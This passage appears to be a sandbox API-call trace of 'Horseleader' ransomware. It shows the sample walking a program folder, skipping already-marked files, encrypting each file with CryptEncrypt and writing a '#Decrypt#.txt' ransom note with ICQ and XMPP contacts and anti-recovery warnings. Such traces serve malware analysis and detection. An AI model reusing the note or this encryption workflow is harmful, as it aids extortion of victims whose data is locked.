| out: pbBuffer=0x32aea98) returned 1 [0251.928] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.928] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportmask_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.928] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x727c06a1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x727c06a1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12b9, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="passport_mask_left.png", cAlternateFileName="")) returned 1 [0251.928] lstrcmpiW (lpString1="passport_mask_left.png", lpString2="Windows") returned -1 [0251.928] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png") returned 77 [0251.928] StrStrIW (lpFirst="passport_mask_left.png", lpSrch=".horseleader") returned 0x0 [0251.928] lstrcmpW (lpString1="passport_mask_left.png", lpString2="#Decrypt#.txt") returned 1 [0251.928] lstrcmpW (lpString1="passport_mask_left.png", lpString2="_uninstalling_.png") returned 1 [0251.928] lstrlenW (lpString=".testttjffg") returned 11 [0251.928] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png", lpSrch=".testttjffg") returned 0x0 [0251.929] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.929] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_mask_left.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.929] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x727e67fe, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x727e67fe, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12cd, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="passport_mask_right.png", cAlternateFileName="")) returned 1 [0251.929] lstrcmpiW (lpString1="passport_mask_right.png", lpString2="Windows") returned -1 [0251.929] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png") returned 78 [0251.929] StrStrIW (lpFirst="passport_mask_right.png", lpSrch=".horseleader") returned 0x0 [0251.929] lstrcmpW (lpString1="passport_mask_right.png", lpString2="#Decrypt#.txt") returned 1 [0251.929] lstrcmpW (lpString1="passport_mask_right.png", lpString2="_uninstalling_.png") returned 1 [0251.929] lstrlenW (lpString=".testttjffg") returned 11 [0251.929] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png", lpSrch=".testttjffg") returned 0x0 [0251.929] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.929] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_mask_right.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.931] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7274e28a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7274e28a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1aaec, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Passport_PAL.wmv", cAlternateFileName="")) returned 1 [0251.931] lstrcmpiW (lpString1="Passport_PAL.wmv", lpString2="Windows") returned -1 [0251.931] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv") returned 71 [0251.931] StrStrIW (lpFirst="Passport_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.931] lstrcmpW (lpString1="Passport_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.931] lstrcmpW (lpString1="Passport_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.931] lstrlenW (lpString=".testttjffg") returned 11 [0251.931] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.931] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.931] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.932] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72538f74, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72538f74, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x18337, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="play-background.png", cAlternateFileName="")) returned 1 [0251.932] lstrcmpiW (lpString1="play-background.png", lpString2="Windows") returned -1 [0251.932] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png") returned 74 [0251.932] StrStrIW (lpFirst="play-background.png", lpSrch=".horseleader") returned 0x0 [0251.932] lstrcmpW (lpString1="play-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.932] lstrcmpW (lpString1="play-background.png", lpString2="_uninstalling_.png") returned 1 [0251.932] lstrlenW (lpString=".testttjffg") returned 11 [0251.932] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png", lpSrch=".testttjffg") returned 0x0 [0251.932] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.932] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\play-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.932] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72512e17, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72512e17, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbf1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="selection_subpicture.png", cAlternateFileName="")) returned 1 [0251.933] lstrcmpiW (lpString1="selection_subpicture.png", lpString2="Windows") returned -1 [0251.933] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png") returned 79 [0251.933] StrStrIW (lpFirst="selection_subpicture.png", lpSrch=".horseleader") returned 0x0 [0251.933] lstrcmpW (lpString1="selection_subpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.933] lstrcmpW (lpString1="selection_subpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.933] lstrlenW (lpString=".testttjffg") returned 11 [0251.933] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.933] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.933] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.933] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\selection_subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.934] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725f7645, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725f7645, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x658e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="travel.png", cAlternateFileName="")) returned 1 [0251.934] lstrcmpiW (lpString1="travel.png", lpString2="Windows") returned -1 [0251.934] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned 65 [0251.934] StrStrIW (lpFirst="travel.png", lpSrch=".horseleader") returned 0x0 [0251.934] lstrcmpW (lpString1="travel.png", lpString2="#Decrypt#.txt") returned 1 [0251.934] lstrcmpW (lpString1="travel.png", lpString2="_uninstalling_.png") returned 1 [0251.934] lstrlenW (lpString=".testttjffg") returned 11 [0251.934] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png", lpSrch=".testttjffg") returned 0x0 [0251.934] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.934] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.934] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travel.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.935] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7258522e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7258522e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55481813, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x321a4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="TravelIntroToMain.wmv", cAlternateFileName="")) returned 1 [0251.935] lstrcmpiW (lpString1="TravelIntroToMain.wmv", lpString2="Windows") returned -1 [0251.936] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned 76 [0251.936] StrStrIW (lpFirst="TravelIntroToMain.wmv", lpSrch=".horseleader") returned 0x0 [0251.936] lstrcmpW (lpString1="TravelIntroToMain.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.936] lstrcmpW (lpString1="TravelIntroToMain.wmv", lpString2="_uninstalling_.png") returned 1 [0251.936] lstrlenW (lpString=".testttjffg") returned 11 [0251.936] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv", lpSrch=".testttjffg") returned 0x0 [0251.936] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.936] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.936] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.936] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725d14e8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725d14e8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xef24, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="TravelIntroToMainMask.wmv", cAlternateFileName="")) returned 1 [0251.936] lstrcmpiW (lpString1="TravelIntroToMainMask.wmv", lpString2="Windows") returned -1 [0251.936] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv") returned 80 [0251.937] StrStrIW (lpFirst="TravelIntroToMainMask.wmv", lpSrch=".horseleader") returned 0x0 [0251.937] lstrcmpW (lpString1="TravelIntroToMainMask.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.937] lstrcmpW (lpString1="TravelIntroToMainMask.wmv", lpString2="_uninstalling_.png") returned 1 [0251.937] lstrlenW (lpString=".testttjffg") returned 11 [0251.937] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv", lpSrch=".testttjffg") returned 0x0 [0251.937] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.937] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.937] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.937] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725f7645, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725f7645, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xef24, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="TravelIntroToMainMask_PAL.wmv", cAlternateFileName="")) returned 1 [0251.937] lstrcmpiW (lpString1="TravelIntroToMainMask_PAL.wmv", lpString2="Windows") returned -1 [0251.937] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned 84 [0251.937] StrStrIW (lpFirst="TravelIntroToMainMask_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.938] lstrcmpW (lpString1="TravelIntroToMainMask_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.938] lstrcmpW (lpString1="TravelIntroToMainMask_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.938] lstrlenW (lpString=".testttjffg") returned 11 [0251.938] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.938] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.938] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.938] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.938] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725ab38b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725ab38b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55481813, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x37f64, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="TravelIntroToMain_PAL.wmv", cAlternateFileName="")) returned 1 [0251.938] lstrcmpiW (lpString1="TravelIntroToMain_PAL.wmv", lpString2="Windows") returned -1 [0251.938] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv") returned 80 [0251.938] StrStrIW (lpFirst="TravelIntroToMain_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.939] lstrcmpW (lpString1="TravelIntroToMain_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.939] lstrcmpW (lpString1="TravelIntroToMain_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.939] lstrlenW (lpString=".testttjffg") returned 11 [0251.939] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.939] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.939] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.939] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.940] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725ab38b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725ab38b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55481813, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x37f64, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="TravelIntroToMain_PAL.wmv", cAlternateFileName="")) returned 0 [0251.940] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.941] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\#Decrypt#.txt") returned 68 [0251.941] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.943] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.943] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.944] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hO